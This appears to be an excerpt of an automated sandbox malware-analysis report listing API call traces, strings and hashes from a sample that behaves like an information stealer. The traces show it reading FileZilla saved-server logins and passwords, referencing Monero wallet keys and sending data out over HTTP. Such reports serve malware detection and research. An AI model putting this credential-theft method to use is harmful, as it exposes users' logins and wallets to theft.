                                          • LocalFree.KERNEL32(?), ref: 00E99BD3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                          • String ID:
                                          • API String ID: 2068576380-0
                                          • Opcode ID: 3d7cec0e9c6345bb6eddc227250f5e183c4cda2c3177404c01568cde8f44ac5b
                                          • Instruction ID: 97481996a9759a5780524994c8da2b7229b7ebb6a039addb8026aae117eb83fd
                                          • Opcode Fuzzy Hash: 3d7cec0e9c6345bb6eddc227250f5e183c4cda2c3177404c01568cde8f44ac5b
                                          • Instruction Fuzzy Hash: 43110CB8A01209DFCB04DF98D985AAE77B5FF88300F104558ED15A7350D775AE10CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tw{$wVk
                                          • API String ID: 0-1620743359
                                          • Opcode ID: a78288a6a6dc55d50409acc81165e8d99c41f12280dd99cb53737faf1b48303f
                                          • Instruction ID: 557fbe6baa84c7a24621b5c4fb0a484d66bae9644e6caf10d3f50c290684463e
                                          • Opcode Fuzzy Hash: a78288a6a6dc55d50409acc81165e8d99c41f12280dd99cb53737faf1b48303f
                                          • Instruction Fuzzy Hash: 77B2E5F360C2049FE304AE2DEC8567AFBE9EB94720F16493DE6C4C7744EA3598058697
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf3e001ef93b7bba975e1c9c9ea5d0a8880bbcd3dd788cf31a337bc47f28d2f1
                                          • Instruction ID: dc9768234719fe1bb208dc7717a9bcbe628c8d9749f86966d65b9a21d96dcedd
                                          • Opcode Fuzzy Hash: cf3e001ef93b7bba975e1c9c9ea5d0a8880bbcd3dd788cf31a337bc47f28d2f1
                                          • Instruction Fuzzy Hash: 66516CF36182049FE7086D3DED9477BB79AEBD4320F2B873DE685C2B84E93558058151
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f5d5090aecc4a0f249834fa8acb74440e0f4149803a32fef4da2ab9ad3f540c
                                          • Instruction ID: 96ba4ff513a9f048aa1dba84479aba43c2d89c4015621f1f379bc07092a83747
                                          • Opcode Fuzzy Hash: 2f5d5090aecc4a0f249834fa8acb74440e0f4149803a32fef4da2ab9ad3f540c
                                          • Instruction Fuzzy Hash: 2341D0B3B142241BD208193CED99777BA9DDB44530F2A023EED42E3BC0F962DD0442D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f83851d5cd50959e1359ec417916a061ff0f90594e514e5a4741fd9e4a03f6a1
                                          • Instruction ID: 6ea1b19746733589500a272b9da91adb1d78e978d6f0b6cf7a65a98924af99a8
                                          • Opcode Fuzzy Hash: f83851d5cd50959e1359ec417916a061ff0f90594e514e5a4741fd9e4a03f6a1
                                          • Instruction Fuzzy Hash: 234118F3A097049FE344AE19DC8477AB3E6EBD8310F2A453DDAC447394EA39AC458746
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e37493c3a0c27c08b8ff34af85c1217f23e700753c6d0d4b41d8e588c268da0
                                          • Instruction ID: 3dc9290c6ad6559bbab1ef7d9948200eeda7e28aa79098f36146d98f700ba8ae
                                          • Opcode Fuzzy Hash: 0e37493c3a0c27c08b8ff34af85c1217f23e700753c6d0d4b41d8e588c268da0
                                          • Instruction Fuzzy Hash: B94110F3E082108BE305AE19DC4176AB7E5EF94720F1A893DD9D887384EA35580087C3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • GetProcessHeap.KERNEL32(00000000,000F423F,00EB0DBA,00EB0DB7,00EB0DB6,00EB0DB3), ref: 00EA0362
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA0369
                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EA0385
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0393
                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EA03CF
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA03DD
                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00EA0419
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0427
                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EA0463
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0475
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0502
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA051A
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0532
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA054A
                                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EA0562
                                          • lstrcat.KERNEL32(?,profile: null), ref: 00EA0571
                                          • lstrcat.KERNEL32(?,url: ), ref: 00EA0580
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA0593
                                          • lstrcat.KERNEL32(?,00EB1678), ref: 00EA05A2
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA05B5
                                          • lstrcat.KERNEL32(?,00EB167C), ref: 00EA05C4
                                          • lstrcat.KERNEL32(?,login: ), ref: 00EA05D3
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA05E6
                                          • lstrcat.KERNEL32(?,00EB1688), ref: 00EA05F5
                                          • lstrcat.KERNEL32(?,password: ), ref: 00EA0604
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA0617
                                          • lstrcat.KERNEL32(?,00EB1698), ref: 00EA0626
                                          • lstrcat.KERNEL32(?,00EB169C), ref: 00EA0635
                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA068E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                          • API String ID: 1942843190-555421843
                                          • Opcode ID: b96e9c9a5faa5821a6a8a2a053d71446763aa1bdb0f5ba352a265f7e9688cc1c
                                          • Instruction ID: 86e57e4e361fdc26bb1ba1daf7d97057e5dbc95bcb1bb627f4a1ae99749cbb5c
                                          • Opcode Fuzzy Hash: b96e9c9a5faa5821a6a8a2a053d71446763aa1bdb0f5ba352a265f7e9688cc1c
                                          • Instruction Fuzzy Hash: CFD11F71A002089BCB54EBE4DD5AEEE73B8AF59300F545468F502BB085DF39BA05CB61
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E959F8
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E95A13
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E95B93
                                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00BBFCC0,00000000,?,00BBEF50,00000000,?,00EB1A1C), ref: 00E95E71
                                          • lstrlen.KERNEL32(00000000), ref: 00E95E82
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E95E93
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E95E9A
                                          • lstrlen.KERNEL32(00000000), ref: 00E95EAF
                                          • lstrlen.KERNEL32(00000000), ref: 00E95ED8
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E95EF1
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 00E95F1B
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E95F2F
                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E95F4C
                                          • InternetCloseHandle.WININET(00000000), ref: 00E95FB0
                                          • InternetCloseHandle.WININET(00000000), ref: 00E95FBD
                                          • HttpOpenRequestA.WININET(00000000,00BBFBD0,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E95BF8
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • InternetCloseHandle.WININET(00000000), ref: 00E95FC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                          • String ID: "$"$------$------$------
                                          • API String ID: 874700897-2180234286
                                          • Opcode ID: dfebd2abd3838bdff909eac58a02600febe61c1e78e62736d379a2304d5c7545
                                          • Instruction ID: f6e1bfbf4151693a9dab1b8ae97acc50f8736f7f695ef26e8fc12936fa46a986
                                          • Opcode Fuzzy Hash: dfebd2abd3838bdff909eac58a02600febe61c1e78e62736d379a2304d5c7545
                                          • Instruction Fuzzy Hash: 64124072920218ABCB59EBA0DC99FEE73B8BF59300F4451A9B10677091EF343A49CF51
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9CF83
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E9D0C7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E9D0CE
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D208
                                          • lstrcat.KERNEL32(?,00EB1478), ref: 00E9D217
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D22A
                                          • lstrcat.KERNEL32(?,00EB147C), ref: 00E9D239
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D24C
                                          • lstrcat.KERNEL32(?,00EB1480), ref: 00E9D25B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D26E
                                          • lstrcat.KERNEL32(?,00EB1484), ref: 00E9D27D
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D290
                                          • lstrcat.KERNEL32(?,00EB1488), ref: 00E9D29F
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D2B2
                                          • lstrcat.KERNEL32(?,00EB148C), ref: 00E9D2C1
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D2D4
